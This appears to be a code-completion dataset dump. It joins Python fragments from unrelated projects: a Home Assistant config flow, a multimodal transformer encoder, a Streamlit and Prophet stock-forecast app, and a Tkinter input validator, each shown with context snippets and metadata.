CONF_NAME: user_input[CONF_NAME],
CONF_LATITUDE: user_input[CONF_LATITUDE],
CONF_LONGITUDE: user_input[CONF_LONGITUDE],
CONF_RADIUS: user_input[CONF_RADIUS],
}
)
return await self.async_step_area_menu()
return self.async_show_form(
step_id="area_update",
data_schema=vol.Schema(
{
vol.Required(
CONF_NAME, default=self.configuring_area[CONF_NAME]
): selector.TextSelector(),
vol.Required(
CONF_RADIUS, default=self.configuring_area[CONF_RADIUS]
): selector.NumberSelector(
selector.NumberSelectorConfig(
mode=selector.NumberSelectorMode.BOX,
unit_of_measurement="miles",
min=1,
max=50,
step=0.1,
)
),
vol.Inclusive(
CONF_LATITUDE,
"coordinates",
"Latitude and longitude must exist together",
default=self.configuring_area[CONF_LATITUDE],
): cv.latitude,
vol.Inclusive(
CONF_LONGITUDE,
"coordinates",
"Latitude and longitude must exist together",
default=self.configuring_area[CONF_LONGITUDE],
): cv.longitude,
}
),
errors=errors,
)
async def async_step_area_delete(self, user_input: dict[str, Any] | None = None):
"""Delete a configured area."""
if user_input is not None:
for i, data in enumerate(self.configured_areas):
if data["name"] == user_input[CONF_NAME]:
self.configured_areas.pop(i)
break
return await self.async_step_area_menu()
if len(self.configured_areas) > 0:
return self.async_show_form(
step_id="area_delete",
data_schema=vol.Schema(
{
vol.Required(CONF_NAME): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.LIST,
options=self.configured_area_names,
)
)
}
),
)
return await self.async_step_area_menu()
async def async_step_finished(self, user_input: dict[str, Any] | None = None):
"""Save configuration."""
errors: dict[str, str] = {}
if user_input is not None:
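            # Fall back to country-specific sources, and then to every known source, if none were selected manually.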
if len(self.configured_sources) > 0:
user_input[CONF_SOURCES] = self.configured_sources
elif self.hass.config.country is not None:
user_input[CONF_SOURCES] = COUNTRY_MAP.get(self.hass.config.country)
else:
user_input[CONF_SOURCES] = list(SOURCE_MAP) | user_input[CONF_AREAS] = self.configured_areas | 2 | 2023-12-19 20:54:21+00:00 | 4k |
thuiar/TCL-MAP | methods/TCL_MAP/SubNets/transformers_encoder/transformer.py | [
{
"identifier": "SinusoidalPositionalEmbedding",
"path": "methods/TCL_MAP/SubNets/transformers_encoder/position_embedding.py",
"snippet": "class SinusoidalPositionalEmbedding(nn.Module):\n \"\"\"This module produces sinusoidal positional embeddings of any length.\n Padding symbols are ignored, but it is necessary to specify whether padding\n is added on the left side (left_pad=True) or right side (left_pad=False).\n \"\"\"\n\n def __init__(self, embedding_dim, padding_idx=0, left_pad=0, init_size=128):\n super().__init__()\n self.embedding_dim = embedding_dim\n self.padding_idx = padding_idx\n self.left_pad = left_pad\n self.weights = dict() # device --> actual weight; due to nn.DataParallel :-(\n self.register_buffer('_float_tensor', torch.FloatTensor(1))\n\n @staticmethod\n def get_embedding(num_embeddings, embedding_dim, padding_idx=None):\n \"\"\"Build sinusoidal embeddings.\n This matches the implementation in tensor2tensor, but differs slightly\n from the description in Section 3.5 of \"Attention Is All You Need\".\n \"\"\"\n half_dim = embedding_dim // 2\n emb = math.log(10000) / (half_dim - 1)\n emb = torch.exp(torch.arange(half_dim, dtype=torch.float) * -emb)\n emb = torch.arange(num_embeddings, dtype=torch.float).unsqueeze(1) * emb.unsqueeze(0)\n emb = torch.cat([torch.sin(emb), torch.cos(emb)], dim=1).view(num_embeddings, -1)\n if embedding_dim % 2 == 1:\n # zero pad\n emb = torch.cat([emb, torch.zeros(num_embeddings, 1)], dim=1)\n if padding_idx is not None:\n emb[padding_idx, :] = 0\n return emb\n\n def forward(self, input):\n \"\"\"Input is expected to be of size [bsz x seqlen].\"\"\"\n bsz, seq_len = input.size()\n max_pos = self.padding_idx + 1 + seq_len\n device = input.get_device()\n if device not in self.weights or max_pos > self.weights[device].size(0):\n # recompute/expand embeddings if needed\n self.weights[device] = SinusoidalPositionalEmbedding.get_embedding(\n max_pos,\n self.embedding_dim,\n self.padding_idx,\n )\n self.weights[device] = self.weights[device].type_as(self._float_tensor).to(input.device)\n positions = make_positions(input, self.padding_idx, self.left_pad)\n return self.weights[device].index_select(0, positions.reshape(-1)).reshape(bsz, seq_len, -1).detach()\n\n def max_positions(self):\n \"\"\"Maximum number of supported positions.\"\"\"\n return int(1e5) # an arbitrary large number"
},
{
"identifier": "MultiheadAttention",
"path": "methods/TCL_MAP/SubNets/transformers_encoder/multihead_attention.py",
"snippet": "class MultiheadAttention(nn.Module):\n \"\"\"Multi-headed attention.\n See \"Attention Is All You Need\" for more details.\n \"\"\"\n\n def __init__(self, embed_dim, num_heads, attn_dropout=0.,\n bias=True, add_bias_kv=False, add_zero_attn=False):\n super().__init__()\n self.embed_dim = embed_dim\n self.num_heads = num_heads\n self.attn_dropout = attn_dropout\n self.head_dim = embed_dim // num_heads\n assert self.head_dim * num_heads == self.embed_dim, \"embed_dim must be divisible by num_heads\"\n self.scaling = self.head_dim ** -0.5\n\n self.in_proj_weight = Parameter(torch.Tensor(3 * embed_dim, embed_dim))\n self.register_parameter('in_proj_bias', None)\n if bias:\n self.in_proj_bias = Parameter(torch.Tensor(3 * embed_dim))\n self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias)\n\n if add_bias_kv:\n self.bias_k = Parameter(torch.Tensor(1, 1, embed_dim))\n self.bias_v = Parameter(torch.Tensor(1, 1, embed_dim))\n else:\n self.bias_k = self.bias_v = None\n\n self.add_zero_attn = add_zero_attn\n\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.xavier_uniform_(self.in_proj_weight)\n nn.init.xavier_uniform_(self.out_proj.weight)\n if self.in_proj_bias is not None:\n nn.init.constant_(self.in_proj_bias, 0.)\n nn.init.constant_(self.out_proj.bias, 0.)\n if self.bias_k is not None:\n nn.init.xavier_normal_(self.bias_k)\n if self.bias_v is not None:\n nn.init.xavier_normal_(self.bias_v)\n\n def forward(self, query, key, value, attn_mask=None):\n \"\"\"Input shape: Time x Batch x Channel\n Self-attention can be implemented by passing in the same arguments for\n query, key and value. Timesteps can be masked by supplying a T x T mask in the\n `attn_mask` argument. Padding elements can be excluded from\n the key by passing a binary ByteTensor (`key_padding_mask`) with shape:\n batch x src_len, where padding elements are indicated by 1s.\n \"\"\"\n qkv_same = query.data_ptr() == key.data_ptr() == value.data_ptr()\n kv_same = key.data_ptr() == value.data_ptr()\n\n tgt_len, bsz, embed_dim = query.size()\n assert embed_dim == self.embed_dim\n assert list(query.size()) == [tgt_len, bsz, embed_dim]\n assert key.size() == value.size()\n\n aved_state = None\n\n if qkv_same:\n # self-attention\n q, k, v = self.in_proj_qkv(query)\n elif kv_same:\n # encoder-decoder attention\n q = self.in_proj_q(query)\n\n if key is None:\n assert value is None\n k = v = None\n else:\n k, v = self.in_proj_kv(key)\n else:\n q = self.in_proj_q(query)\n k = self.in_proj_k(key)\n v = self.in_proj_v(value)\n q = q * self.scaling\n\n if self.bias_k is not None:\n assert self.bias_v is not None\n k = torch.cat([k, self.bias_k.repeat(1, bsz, 1)])\n v = torch.cat([v, self.bias_v.repeat(1, bsz, 1)])\n if attn_mask is not None:\n attn_mask = torch.cat([attn_mask, attn_mask.new_zeros(attn_mask.size(0), 1)], dim=1)\n\n q = q.contiguous().view(tgt_len, bsz * self.num_heads, self.head_dim).transpose(0, 1)\n if k is not None:\n k = k.contiguous().view(-1, bsz * self.num_heads, self.head_dim).transpose(0, 1)\n if v is not None:\n v = v.contiguous().view(-1, bsz * self.num_heads, self.head_dim).transpose(0, 1)\n\n src_len = k.size(1)\n\n if self.add_zero_attn:\n src_len += 1\n k = torch.cat([k, k.new_zeros((k.size(0), 1) + k.size()[2:])], dim=1)\n v = torch.cat([v, v.new_zeros((v.size(0), 1) + v.size()[2:])], dim=1)\n if attn_mask is not None:\n attn_mask = torch.cat([attn_mask, attn_mask.new_zeros(attn_mask.size(0), 1)], dim=1)\n \n attn_weights = torch.bmm(q, k.transpose(1, 2))\n assert 
list(attn_weights.size()) == [bsz * self.num_heads, tgt_len, src_len]\n\n if attn_mask is not None:\n try:\n attn_weights += attn_mask.unsqueeze(0)\n except:\n print(attn_weights.shape)\n print(attn_mask.unsqueeze(0).shape)\n assert False\n \n attn_weights = F.softmax(attn_weights.float(), dim=-1).type_as(attn_weights)\n # attn_weights = F.relu(attn_weights)\n # attn_weights = attn_weights / torch.max(attn_weights)\n attn_weights = F.dropout(attn_weights, p=self.attn_dropout, training=self.training)\n\n attn = torch.bmm(attn_weights, v)\n assert list(attn.size()) == [bsz * self.num_heads, tgt_len, self.head_dim]\n\n attn = attn.transpose(0, 1).contiguous().view(tgt_len, bsz, embed_dim)\n attn = self.out_proj(attn)\n\n # average attention weights over heads\n attn_weights = attn_weights.view(bsz, self.num_heads, tgt_len, src_len)\n attn_weights = attn_weights.sum(dim=1) / self.num_heads\n return attn, attn_weights\n\n def in_proj_qkv(self, query):\n return self._in_proj(query).chunk(3, dim=-1)\n\n def in_proj_kv(self, key):\n return self._in_proj(key, start=self.embed_dim).chunk(2, dim=-1)\n\n def in_proj_q(self, query, **kwargs):\n return self._in_proj(query, end=self.embed_dim, **kwargs)\n\n def in_proj_k(self, key):\n return self._in_proj(key, start=self.embed_dim, end=2 * self.embed_dim)\n\n def in_proj_v(self, value):\n return self._in_proj(value, start=2 * self.embed_dim)\n\n def _in_proj(self, input, start=0, end=None, **kwargs):\n weight = kwargs.get('weight', self.in_proj_weight)\n bias = kwargs.get('bias', self.in_proj_bias)\n weight = weight[start:end, :]\n if bias is not None:\n bias = bias[start:end]\n return F.linear(input, weight, bias)"
}
] | import torch
import torch.nn.functional as F
import math
from torch import nn
from .position_embedding import SinusoidalPositionalEmbedding
from .multihead_attention import MultiheadAttention | 3,461 |
class TransformerEncoder(nn.Module):
"""
Transformer encoder consisting of *args.encoder_layers* layers. Each layer
is a :class:`TransformerEncoderLayer`.
Args:
embed_tokens (torch.nn.Embedding): input embedding
num_heads (int): number of heads
layers (int): number of layers
attn_dropout (float): dropout applied on the attention weights
relu_dropout (float): dropout applied on the first layer of the residual block
res_dropout (float): dropout applied on the residual block
attn_mask (bool): whether to apply mask on the attention weights
"""
def __init__(self, embed_dim, num_heads, layers, attn_dropout=0.0, relu_dropout=0.0, res_dropout=0.0,
embed_dropout=0.0, attn_mask=False):
super().__init__()
self.dropout = embed_dropout # Embedding dropout
self.attn_dropout = attn_dropout
self.embed_dim = embed_dim
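        # Inputs are scaled by sqrt(embed_dim) before the positional embeddings are added, as in the original Transformer.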
self.embed_scale = math.sqrt(embed_dim)
self.embed_positions = SinusoidalPositionalEmbedding(embed_dim)
self.attn_mask = attn_mask
self.layers = nn.ModuleList([])
for layer in range(layers):
new_layer = TransformerEncoderLayer(embed_dim,
num_heads=num_heads,
attn_dropout=attn_dropout,
relu_dropout=relu_dropout,
res_dropout=res_dropout,
attn_mask=attn_mask)
self.layers.append(new_layer)
self.register_buffer('version', torch.Tensor([2]))
self.normalize = True
if self.normalize:
self.layer_norm = LayerNorm(embed_dim)
def forward(self, x_in, x_in_k = None, x_in_v = None):
"""
Args:
x_in (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
x_in_k (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
x_in_v (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
Returns:
dict:
- **encoder_out** (Tensor): the last encoder layer's output of
shape `(src_len, batch, embed_dim)`
- **encoder_padding_mask** (ByteTensor): the positions of
padding elements of shape `(batch, src_len)`
"""
# embed tokens and positions
x = self.embed_scale * x_in
if self.embed_positions is not None:
x += self.embed_positions(x_in.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x = F.dropout(x, p=self.dropout, training=self.training)
if x_in_k is not None and x_in_v is not None:
# embed tokens and positions
x_k = self.embed_scale * x_in_k
x_v = self.embed_scale * x_in_v
if self.embed_positions is not None:
x_k += self.embed_positions(x_in_k.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x_v += self.embed_positions(x_in_v.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x_k = F.dropout(x_k, p=self.dropout, training=self.training)
x_v = F.dropout(x_v, p=self.dropout, training=self.training)
# encoder layers
intermediates = [x]
for layer in self.layers:
if x_in_k is not None and x_in_v is not None:
x = layer(x, x_k, x_v)
else:
x = layer(x)
intermediates.append(x)
if self.normalize:
x = self.layer_norm(x)
return x
def max_positions(self):
"""Maximum input length supported by the encoder."""
if self.embed_positions is None:
return self.max_source_positions
return min(self.max_source_positions, self.embed_positions.max_positions())
class TransformerEncoderLayer(nn.Module):
"""Encoder layer block.
In the original paper each operation (multi-head attention or FFN) is
postprocessed with: `dropout -> add residual -> layernorm`. In the
tensor2tensor code they suggest that learning is more robust when
preprocessing each layer with layernorm and postprocessing with:
`dropout -> add residual`. We default to the approach in the paper, but the
tensor2tensor approach can be enabled by setting
*args.encoder_normalize_before* to ``True``.
Args:
embed_dim: Embedding dimension
"""
def __init__(self, embed_dim, num_heads=4, attn_dropout=0.1, relu_dropout=0.1, res_dropout=0.1,
attn_mask=False):
super().__init__()
self.embed_dim = embed_dim
self.num_heads = num_heads
|
class TransformerEncoder(nn.Module):
"""
Transformer encoder consisting of *args.encoder_layers* layers. Each layer
is a :class:`TransformerEncoderLayer`.
Args:
embed_tokens (torch.nn.Embedding): input embedding
num_heads (int): number of heads
layers (int): number of layers
attn_dropout (float): dropout applied on the attention weights
relu_dropout (float): dropout applied on the first layer of the residual block
res_dropout (float): dropout applied on the residual block
attn_mask (bool): whether to apply mask on the attention weights
"""
def __init__(self, embed_dim, num_heads, layers, attn_dropout=0.0, relu_dropout=0.0, res_dropout=0.0,
embed_dropout=0.0, attn_mask=False):
super().__init__()
self.dropout = embed_dropout # Embedding dropout
self.attn_dropout = attn_dropout
self.embed_dim = embed_dim
self.embed_scale = math.sqrt(embed_dim)
self.embed_positions = SinusoidalPositionalEmbedding(embed_dim)
self.attn_mask = attn_mask
self.layers = nn.ModuleList([])
for layer in range(layers):
new_layer = TransformerEncoderLayer(embed_dim,
num_heads=num_heads,
attn_dropout=attn_dropout,
relu_dropout=relu_dropout,
res_dropout=res_dropout,
attn_mask=attn_mask)
self.layers.append(new_layer)
self.register_buffer('version', torch.Tensor([2]))
self.normalize = True
if self.normalize:
self.layer_norm = LayerNorm(embed_dim)
def forward(self, x_in, x_in_k = None, x_in_v = None):
"""
Args:
x_in (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
x_in_k (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
x_in_v (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
Returns:
dict:
- **encoder_out** (Tensor): the last encoder layer's output of
shape `(src_len, batch, embed_dim)`
- **encoder_padding_mask** (ByteTensor): the positions of
padding elements of shape `(batch, src_len)`
"""
# embed tokens and positions
x = self.embed_scale * x_in
if self.embed_positions is not None:
x += self.embed_positions(x_in.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x = F.dropout(x, p=self.dropout, training=self.training)
if x_in_k is not None and x_in_v is not None:
# embed tokens and positions
x_k = self.embed_scale * x_in_k
x_v = self.embed_scale * x_in_v
if self.embed_positions is not None:
x_k += self.embed_positions(x_in_k.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x_v += self.embed_positions(x_in_v.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x_k = F.dropout(x_k, p=self.dropout, training=self.training)
x_v = F.dropout(x_v, p=self.dropout, training=self.training)
# encoder layers
intermediates = [x]
for layer in self.layers:
if x_in_k is not None and x_in_v is not None:
x = layer(x, x_k, x_v)
else:
x = layer(x)
intermediates.append(x)
if self.normalize:
x = self.layer_norm(x)
return x
def max_positions(self):
"""Maximum input length supported by the encoder."""
if self.embed_positions is None:
return self.max_source_positions
return min(self.max_source_positions, self.embed_positions.max_positions())
class TransformerEncoderLayer(nn.Module):
"""Encoder layer block.
In the original paper each operation (multi-head attention or FFN) is
postprocessed with: `dropout -> add residual -> layernorm`. In the
tensor2tensor code they suggest that learning is more robust when
preprocessing each layer with layernorm and postprocessing with:
`dropout -> add residual`. We default to the approach in the paper, but the
tensor2tensor approach can be enabled by setting
*args.encoder_normalize_before* to ``True``.
Args:
embed_dim: Embedding dimension
"""
def __init__(self, embed_dim, num_heads=4, attn_dropout=0.1, relu_dropout=0.1, res_dropout=0.1,
attn_mask=False):
super().__init__()
self.embed_dim = embed_dim
self.num_heads = num_heads
| self.self_attn = MultiheadAttention( | 1 | 2023-12-20 03:12:38+00:00 | 4k |
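For reference, a minimal self-contained sketch of the cross-modal attention pattern that the TransformerEncoder record above implements (queries from one modality, keys/values from another). It uses torch.nn.MultiheadAttention as a stand-in for the repository's custom class, and every size below is made up for illustration.

import torch
import torch.nn as nn

embed_dim, num_heads = 32, 4
attn = nn.MultiheadAttention(embed_dim, num_heads)  # expects (seq_len, batch, embed_dim) by default

x_q = torch.randn(10, 2, embed_dim)   # query modality, e.g. 10 text steps, batch of 2
x_kv = torch.randn(50, 2, embed_dim)  # key/value modality, e.g. 50 audio steps

# Cross-modal attention, mirroring layer(x, x_k, x_v) in the encoder's forward pass
out, weights = attn(x_q, x_kv, x_kv)
print(out.shape)      # torch.Size([10, 2, 32])
print(weights.shape)  # torch.Size([2, 10, 50]), averaged over heads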
abdellatif-laghjaj/stock-market-prediction | main.py | [
{
"identifier": "load_data",
"path": "services.py",
"snippet": "@st.cache_data\ndef load_data(ticker, start, end):\n \"\"\"\n Load historical stock price data from Yahoo Finance.\n\n Parameters:\n - ticker (str): Stock symbol (e.g., AAPL).\n - start (str): Start date in the format 'YYYY-MM-DD'.\n - end (str): End date in the format 'YYYY-MM-DD'.\n\n Returns:\n - data (pd.DataFrame): DataFrame containing historical stock price data.\n \"\"\"\n try:\n data = yf.download(ticker, start, end)\n data.reset_index(inplace=True)\n return data\n except Exception as e:\n st.error(f\"Error loading data for {ticker}: {str(e)}\")\n return None"
},
{
"identifier": "plot_data",
"path": "services.py",
"snippet": "def plot_data(data):\n \"\"\"\n Plot historical stock price data.\n\n Parameters:\n - data (pd.DataFrame): DataFrame containing historical stock price data.\n \"\"\"\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=data['Date'], y=data['Open'], name=\"stock_open\"))\n fig.add_trace(go.Scatter(x=data['Date'], y=data['Close'], name=\"stock_close\"))\n fig.update_layout(title_text=\"Stock Prices Over Time\", xaxis_rangeslider_visible=True)\n st.plotly_chart(fig, use_container_width=True)"
},
{
"identifier": "plot_multiple_data",
"path": "services.py",
"snippet": "def plot_multiple_data(data, stock_names):\n \"\"\"\n Plot forecasted stock prices for multiple stocks.\n\n Parameters:\n - data (list): List of DataFrames containing forecasted stock price data.\n - stock_names (list): List of stock names corresponding to the forecasted data.\n \"\"\"\n fig = go.Figure()\n for i, stock_data in enumerate(data):\n fig.add_trace(go.Scatter(x=stock_data['ds'], y=stock_data['yhat'], name=f\"yhat - {stock_names[i]}\"))\n fig.update_layout(title_text=\"Stock Prices Over Time\", xaxis_rangeslider_visible=True)\n st.plotly_chart(fig, use_container_width=True)"
},
{
"identifier": "plot_volume",
"path": "services.py",
"snippet": "def plot_volume(data):\n \"\"\"\n Plot historical stock volume data.\n\n Parameters:\n - data (pd.DataFrame): DataFrame containing historical stock volume data.\n \"\"\"\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=data['Date'], y=data['Volume'], name=\"stock_volume\"))\n fig.update_layout(title_text=\"Stock Volume Over Time\", xaxis_rangeslider_visible=True)\n st.plotly_chart(fig, use_container_width=True)"
}
] | from time import sleep
from sklearn.metrics import mean_absolute_error
from streamlit_option_menu import option_menu
from datetime import date
from prophet import Prophet
from prophet.plot import plot_plotly
from services import load_data, plot_data, plot_multiple_data, plot_volume
import uuid
import pandas as pd
import streamlit as st | 1,721 |
# Set page layout to wide
st.set_page_config(layout="wide", page_title="Forcastify", page_icon="📈")
# Sidebar
st.sidebar.markdown("<h1 style='text-align: center; font-size: 30px;'><b>Forcasti.</b><b style='color: orange'>fy</b></h1>", unsafe_allow_html=True)
st.sidebar.title("Options")
start_date_key = str(uuid.uuid4())
start_date = st.sidebar.date_input("Start date", date(2018, 1, 1), key=start_date_key)
end_date = st.sidebar.date_input("End date", date.today())
# Header
st.markdown("<h1 style='text-align: center;'>Stock Forecast App 📈</h1>", unsafe_allow_html=True)
st.markdown("<p style='text-align: center;'><b>Forcasti.</b><b style='color: orange'>fy</b> is a simple web app for stock price prediction using the <a href='https://facebook.github.io/prophet/'>Prophet</a> library.</p>", unsafe_allow_html=True)
selected_tab = option_menu(
menu_title=None,
options=["Dataframes", "Plots", "Statistics", "Forecasting", "Comparison"],
icons=["table", "bar-chart", "calculator", "graph-up-arrow", "arrow-down-up"],
menu_icon="📊",
default_index=0,
orientation="horizontal",
)
# Stock selection
stocks = ("AAPL", "GOOG", "MSFT", "GME", "AMC", "TSLA", "AMZN", "NFLX", "NVDA", "AMD", "PYPL")
# Stocks abbreviations
selected_stock = st.sidebar.selectbox("Select stock for prediction", stocks)
selected_stocks = st.sidebar.multiselect("Select stocks for comparison", stocks)
years_to_predict = st.sidebar.slider("Years of prediction:", 1, 5)
period = years_to_predict * 365
# Display a loading spinner while loading data
with st.spinner("Loading data..."):
data = load_data(selected_stock, start_date, end_date)
sleep(1)
# Display the success message
success_message = st.success("Data loaded successfully!")
# Introduce a delay before clearing the success message
sleep(1)
# Clear the success message
success_message.empty()
# Forecasting
df_train = data[["Date", "Close"]]
df_train = df_train.rename(columns={"Date": "ds", "Close": "y"})
model = Prophet()
model.fit(df_train)
future = model.make_future_dataframe(periods=period)
forecast = model.predict(future)
# Convert end_date to datetime
end_date_datetime = pd.to_datetime(end_date)
# Filter forecast based on end_date
forecast = forecast[forecast['ds'] >= end_date_datetime]
# Dataframes Tab
if selected_tab == "Dataframes":
# Display historical data
st.markdown("<h2><span style='color: orange;'>{}</span> Historical Data</h2>".format(selected_stock), unsafe_allow_html=True)
st.write("This section displays historical stock price data for {} from {} to {}.".format(selected_stock, start_date, end_date))
# Copy data
new_data = data.copy()
# Drop Adj Close and Volume columns
new_data = data.drop(columns=['Adj Close', 'Volume'])
st.dataframe(new_data, use_container_width=True)
# Display forecast data
st.markdown("<h2><span style='color: orange;'>{}</span> Forecast Data</h2>".format(selected_stock), unsafe_allow_html=True)
st.write("This section displays the forecasted stock price data for {} using the Prophet model from {} to {}.".format(selected_stock, end_date, end_date + pd.Timedelta(days=period)))
# Copy forecast dataframe
new_forecast = forecast.copy()
# Drop unwanted columns
new_forecast = new_forecast.drop(columns=[
'additive_terms',
'additive_terms_lower',
'additive_terms_upper',
'weekly',
'weekly_lower',
'weekly_upper',
'yearly',
'yearly_lower',
'yearly_upper',
'multiplicative_terms',
'multiplicative_terms_lower',
'multiplicative_terms_upper'
])
# Rename columns
new_forecast = new_forecast.rename(columns={
"ds": "Date",
"yhat": "Close",
"yhat_lower": "Close Lower",
"yhat_upper": "Close Upper",
"trend": "Trend",
"trend_lower": "Trend Lower",
"trend_upper": "Trend Upper"
})
st.dataframe(new_forecast, use_container_width=True)
# Plots Tab
if selected_tab == "Plots":
# Raw data plot
plot_data(data)
# Data Volume plot
|
# Set page layout to wide
st.set_page_config(layout="wide", page_title="Forcastify", page_icon="📈")
# Sidebar
st.sidebar.markdown("<h1 style='text-align: center; font-size: 30px;'><b>Forcasti.</b><b style='color: orange'>fy</b></h1>", unsafe_allow_html=True)
st.sidebar.title("Options")
start_date_key = str(uuid.uuid4())
start_date = st.sidebar.date_input("Start date", date(2018, 1, 1), key=start_date_key)
end_date = st.sidebar.date_input("End date", date.today())
# Header
st.markdown("<h1 style='text-align: center;'>Stock Forecast App 📈</h1>", unsafe_allow_html=True)
st.markdown("<p style='text-align: center;'><b>Forcasti.</b><b style='color: orange'>fy</b> is a simple web app for stock price prediction using the <a href='https://facebook.github.io/prophet/'>Prophet</a> library.</p>", unsafe_allow_html=True)
selected_tab = option_menu(
menu_title=None,
options=["Dataframes", "Plots", "Statistics", "Forecasting", "Comparison"],
icons=["table", "bar-chart", "calculator", "graph-up-arrow", "arrow-down-up"],
menu_icon="📊",
default_index=0,
orientation="horizontal",
)
# Stock selection
stocks = ("AAPL", "GOOG", "MSFT", "GME", "AMC", "TSLA", "AMZN", "NFLX", "NVDA", "AMD", "PYPL")
# Stocks abbreviations
selected_stock = st.sidebar.selectbox("Select stock for prediction", stocks)
selected_stocks = st.sidebar.multiselect("Select stocks for comparison", stocks)
years_to_predict = st.sidebar.slider("Years of prediction:", 1, 5)
period = years_to_predict * 365
# Display a loading spinner while loading data
with st.spinner("Loading data..."):
data = load_data(selected_stock, start_date, end_date)
sleep(1)
# Display the success message
success_message = st.success("Data loaded successfully!")
# Introduce a delay before clearing the success message
sleep(1)
# Clear the success message
success_message.empty()
# Forecasting
df_train = data[["Date", "Close"]]
df_train = df_train.rename(columns={"Date": "ds", "Close": "y"})
model = Prophet()
model.fit(df_train)
future = model.make_future_dataframe(periods=period)
forecast = model.predict(future)
# Convert end_date to datetime
end_date_datetime = pd.to_datetime(end_date)
# Filter forecast based on end_date
forecast = forecast[forecast['ds'] >= end_date_datetime]
# Dataframes Tab
if selected_tab == "Dataframes":
# Display historical data
st.markdown("<h2><span style='color: orange;'>{}</span> Historical Data</h2>".format(selected_stock), unsafe_allow_html=True)
st.write("This section displays historical stock price data for {} from {} to {}.".format(selected_stock, start_date, end_date))
# Copy data
new_data = data.copy()
# Drop Adj Close and Volume columns
new_data = data.drop(columns=['Adj Close', 'Volume'])
st.dataframe(new_data, use_container_width=True)
# Display forecast data
st.markdown("<h2><span style='color: orange;'>{}</span> Forecast Data</h2>".format(selected_stock), unsafe_allow_html=True)
st.write("This section displays the forecasted stock price data for {} using the Prophet model from {} to {}.".format(selected_stock, end_date, end_date + pd.Timedelta(days=period)))
# Copy forecast dataframe
new_forecast = forecast.copy()
# Drop unwanted columns
new_forecast = new_forecast.drop(columns=[
'additive_terms',
'additive_terms_lower',
'additive_terms_upper',
'weekly',
'weekly_lower',
'weekly_upper',
'yearly',
'yearly_lower',
'yearly_upper',
'multiplicative_terms',
'multiplicative_terms_lower',
'multiplicative_terms_upper'
])
# Rename columns
new_forecast = new_forecast.rename(columns={
"ds": "Date",
"yhat": "Close",
"yhat_lower": "Close Lower",
"yhat_upper": "Close Upper",
"trend": "Trend",
"trend_lower": "Trend Lower",
"trend_upper": "Trend Upper"
})
st.dataframe(new_forecast, use_container_width=True)
# Plots Tab
if selected_tab == "Plots":
# Raw data plot
plot_data(data)
# Data Volume plot | plot_volume(data) | 3 | 2023-12-17 11:38:48+00:00 | 4k |
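As a reading aid for the stock-forecast record above, here is a minimal sketch of the same Prophet fit/forecast flow on a synthetic series; the dates, values and cutoff below are invented, and only the ds/y column names are actually required by Prophet.

import pandas as pd
from prophet import Prophet

df = pd.DataFrame({
    "ds": pd.date_range("2023-01-01", periods=120, freq="D"),
    "y": range(120),  # toy closing prices
})

m = Prophet()
m.fit(df)

future = m.make_future_dataframe(periods=30)  # 30 days beyond the observed history
forecast = m.predict(future)

# Keep only rows after the last observed date, as the app does with end_date
cutoff = pd.to_datetime("2023-04-30")
print(forecast.loc[forecast["ds"] >= cutoff, ["ds", "yhat", "yhat_lower", "yhat_upper"]].head())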
CoolPointerException/Amigo | gui/tab_task.py | [
{
"identifier": "Properties",
"path": "gui/input_validator.py",
"snippet": "class Properties(Enum):\n PROJECT_NAME = 1\n SELECTED_DIRECTORY = 2\n API_TYPE = 3\n API_BASE = 4\n API_VERSION = 5\n API_KEY = 6\n GPT_MODEL = 7\n GPT_DEPLOYMENT = 8\n EMBEDDING_MODEL = 9\n EMBEDDING_DEPLOYMENT = 10\n PROMPT = 11\n MAX_TOKENS = 12\n TASK_REQUIREMENTS = 13\n SELECTED_PROJECT = 14\n THREADS = 15\n REINDEX_PROJECT = 16"
},
{
"identifier": "validate",
"path": "gui/input_validator.py",
"snippet": "def validate(gui, properties):\n for prop in properties:\n match prop:\n case Properties.PROJECT_NAME:\n project_name = gui.projects_tab.project_name_entry.get()\n if not project_name:\n messagebox.showerror(\"Error\", \"Please enter a project name.\")\n return False\n\n if project_name in forbidden_names:\n messagebox.showerror(\"Error\", \"Please enter a valid project name. \\nForbidden names:\\n - \" + \"\\n - \"\n .join(forbidden_names))\n return False\n case Properties.SELECTED_DIRECTORY:\n selected_directory = gui.projects_tab.selected_directory\n if not selected_directory:\n messagebox.showerror(\"Error\", \"Please select a directory.\")\n return False\n case Properties.API_TYPE:\n api_type = gui.settings_tab.api_type.get()\n if not api_type:\n messagebox.showerror(\"Error\", \"Please select API type in Settings Tab.\")\n return False\n case Properties.API_BASE:\n api_base = gui.settings_tab.api_host_entry.get()\n if not api_base:\n messagebox.showerror(\"Error\", \"Please enter API base in Settings Tab.\")\n return False\n case Properties.API_VERSION:\n api_version = gui.settings_tab.api_version_entry.get()\n if not api_version:\n messagebox.showerror(\"Error\", \"Please enter API version in Settings Tab.\")\n return False\n case Properties.API_KEY:\n api_key = gui.settings_tab.api_key_entry.get()\n if not api_key:\n messagebox.showerror(\"Error\", \"Please enter API key in Settings Tab.\")\n return False\n case Properties.GPT_MODEL:\n gpt_model = gui.settings_tab.gpt_model.get()\n if not gpt_model:\n messagebox.showerror(\"Error\", \"Please enter GPT model name in Settings Tab.\")\n return False\n case Properties.GPT_DEPLOYMENT:\n gpt_deployment = gui.settings_tab.gpt_deployment.get()\n if not gpt_deployment:\n messagebox.showerror(\"Error\", \"Please enter GPT deployment name in Settings Tab.\")\n return False\n case Properties.EMBEDDING_MODEL:\n embedding_model = gui.settings_tab.embeddings_model_entry.get()\n if not embedding_model:\n messagebox.showerror(\"Error\", \"Please enter embedding model name in Settings Tab.\")\n return False\n case 